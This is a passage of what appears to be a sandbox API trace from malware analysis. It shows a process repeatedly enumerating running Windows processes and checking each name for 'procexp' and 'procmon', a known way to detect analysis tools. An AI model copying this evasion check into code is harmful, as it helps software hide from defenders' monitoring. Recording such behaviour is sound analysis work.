th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.956] StrStrIW (lpFirst="svchost.exe", lpSrch="procexp") returned 0x0 [0055.956] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.956] StrStrIW (lpFirst="svchost.exe", lpSrch="procexp") returned 0x0 [0055.956] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.957] StrStrIW (lpFirst="svchost.exe", lpSrch="procexp") returned 0x0 [0055.957] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0055.958] StrStrIW (lpFirst="spoolsv.exe", lpSrch="procexp") returned 0x0 [0055.958] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.958] StrStrIW (lpFirst="svchost.exe", lpSrch="procexp") returned 0x0 [0055.958] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x550, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.959] StrStrIW (lpFirst="svchost.exe", lpSrch="procexp") returned 0x0 [0055.959] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0055.960] StrStrIW (lpFirst="sihost.exe", lpSrch="procexp") returned 0x0 [0055.960] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x728, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0055.960] StrStrIW (lpFirst="taskhostw.exe", lpSrch="procexp") returned 0x0 [0055.960] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0055.961] StrStrIW (lpFirst="explorer.exe", lpSrch="procexp") returned 0x0 [0055.961] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0055.962] StrStrIW (lpFirst="RuntimeBroker.exe", lpSrch="procexp") returned 0x0 [0055.962] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0055.963] StrStrIW (lpFirst="ShellExperienceHost.exe", lpSrch="procexp") returned 0x0 [0055.963] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0055.963] StrStrIW (lpFirst="SearchUI.exe", lpSrch="procexp") returned 0x0 [0055.963] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.964] StrStrIW (lpFirst="svchost.exe", lpSrch="procexp") returned 0x0 [0055.964] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x320, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0055.965] StrStrIW (lpFirst="UsoClient.exe", lpSrch="procexp") returned 0x0 [0055.965] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x320, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0055.965] StrStrIW (lpFirst="taskhostw.exe", lpSrch="procexp") returned 0x0 [0055.965] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0055.966] StrStrIW (lpFirst="WMIADAP.exe", lpSrch="procexp") returned 0x0 [0055.966] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0055.967] StrStrIW (lpFirst="sppsvc.exe", lpSrch="procexp") returned 0x0 [0055.967] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x718, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0055.967] StrStrIW (lpFirst="conhost.exe", lpSrch="procexp") returned 0x0 [0055.967] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x414, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0055.968] StrStrIW (lpFirst="backgroundTaskHost.exe", lpSrch="procexp") returned 0x0 [0055.968] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0055.968] StrStrIW (lpFirst="backgroundTaskHost.exe", lpSrch="procexp") returned 0x0 [0055.968] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0055.969] StrStrIW (lpFirst="WmiPrvSE.exe", lpSrch="procexp") returned 0x0 [0055.969] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0055.970] StrStrIW (lpFirst="dllhost.exe", lpSrch="procexp") returned 0x0 [0055.970] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0055.970] StrStrIW (lpFirst="audiodg.exe", lpSrch="procexp") returned 0x0 [0055.970] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.971] StrStrIW (lpFirst="svchost.exe", lpSrch="procexp") returned 0x0 [0055.971] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0055.972] StrStrIW (lpFirst="dllhost.exe", lpSrch="procexp") returned 0x0 [0055.972] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0055.972] StrStrIW (lpFirst="dllhost.exe", lpSrch="procexp") returned 0x0 [0055.972] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x990, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="Tax Tool.exe")) returned 1 [0055.973] StrStrIW (lpFirst="Tax Tool.exe", lpSrch="procexp") returned 0x0 [0055.973] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0055.973] StrStrIW (lpFirst="taskhostw.exe", lpSrch="procexp") returned 0x0 [0055.973] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 0 [0055.974] CloseHandle (hObject=0x1e0) returned 1 [0055.974] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1e0 [0055.978] Process32FirstW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0055.979] StrStrIW (lpFirst="[System Process]", lpSrch="procmon") returned 0x0 [0055.979] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0055.986] StrStrIW (lpFirst="System", lpSrch="procmon") returned 0x0 [0055.986] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0055.986] StrStrIW (lpFirst="smss.exe", lpSrch="procmon") returned 0x0 [0055.986] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0055.987] StrStrIW (lpFirst="csrss.exe", lpSrch="procmon") returned 0x0 [0055.987] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0055.987] StrStrIW (lpFirst="wininit.exe", lpSrch="procmon") returned 0x0 [0055.987] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0055.988] StrStrIW (lpFirst="csrss.exe", lpSrch="procmon") returned 0x0 [0055.988] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0055.989] StrStrIW (lpFirst="winlogon.exe", lpSrch="procmon") returned 0x0 [0055.989] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0055.989] StrStrIW (lpFirst="services.exe", lpSrch="procmon") returned 0x0 [0055.989] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0055.990] StrStrIW (lpFirst="lsass.exe", lpSrch="procmon") returned 0x0 [0055.990] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.990] StrStrIW (lpFirst="svchost.exe", lpSrch="procmon") returned 0x0 [0055.990] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.991] StrStrIW (lpFirst="svchost.exe", lpSrch="procmon") returned 0x0 [0055.991] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c4, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0055.992] StrStrIW (lpFirst="dwm.exe", lpSrch="procmon") returned 0x0 [0055.992] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.992] StrStrIW (lpFirst="svchost.exe", lpSrch="procmon") returned 0x0 [0055.992] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.993] StrStrIW (lpFirst="svchost.exe", lpSrch="procmon") returned 0x0 [0055.993] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x354, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.994] StrStrIW (lpFirst="svchost.exe", lpSrch="procmon") returned 0x0 [0055.994] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.995] StrStrIW (lpFirst="svchost.exe", lpSrch="procmon") returned 0x0 [0055.995] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.995] StrStrIW (lpFirst="svchost.exe", lpSrch="procmon") returned 0x0 [0055.995] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.996] StrStrIW (lpFirst="svchost.exe", lpSrch="procmon") returned 0x0 [0055.996] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0055.996] StrStrIW (lpFirst="spoolsv.exe", lpSrch="procmon") returned 0x0 [0055.996] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.997] StrStrIW (lpFirst="svchost.exe", lpSrch="procmon") returned 0x0 [0055.997] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x550, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.998] StrStrIW (lpFirst="svchost.exe", lpSrch="procmon") returned 0x0 [0055.998] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0055.998] StrStrIW (lpFirst="sihost.exe", lpSrch="procmon") returned 0x0 [0055.998] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x728, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0055.999] StrStrIW (lpFirst="taskhostw.exe", lpSrch="procmon") returned 0x0 [0055.999] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0056.000] StrStrIW (lpFirst="explorer.exe", lpSrch="procmon") returned 0x0 [0056.000] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0056.000] StrStrIW (lpFirst="RuntimeBroker.exe", lpSrch="procmon") returned 0x0 [0056.000] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0056.001] StrStrIW (lpFirst="ShellExperienceHost.exe", lpSrch="procmon") returned 0x0 [0056.001] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0056.002] StrStrIW (lpFirst="SearchUI.exe", lpSrch="procmon") returned 0x0 [0056.002] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.002] StrStrIW (lpFirst="svchost.exe", lpSrch="procmon") returned 0x0 [0056.002] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x320, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0056.003] StrStrIW (lpFirst="UsoClient.exe", lpSrch="procmon") returned 0x0 [0056.004] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x320, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0056.004] StrStrIW (lpFirst="taskhostw.exe", lpSrch="procmon") returned 0x0 [0056.004] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0056.005] StrStrIW (lpFirst="WMIADAP.exe", lpSrch="procmon") returned 0x0 [0056.005] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0056.005] StrStrIW (lpFirst="sppsvc.exe", lpSrch="procmon") returned 0x0 [0056.005] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x718, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.006] StrStrIW (lpFirst="conhost.exe", lpSrch="procmon") returned 0x0 [0056.006] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x414, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0056.007] StrStrIW (lpFirst="backgroundTaskHost.exe", lpSrch="procmon") returned 0x0 [0056.007] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0056.007] StrStrIW (lpFirst="backgroundTaskHost.exe", lpSrch="procmon") returned 0x0 [0056.007] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0056.008] StrStrIW (lpFirst="WmiPrvSE.exe", lpSrch="procmon") returned 0x0 [0056.008] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0056.009] StrStrIW (lpFirst="dllhost.exe", lpSrch="procmon") returned 0x0 [0056.009] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0056.010] StrStrIW 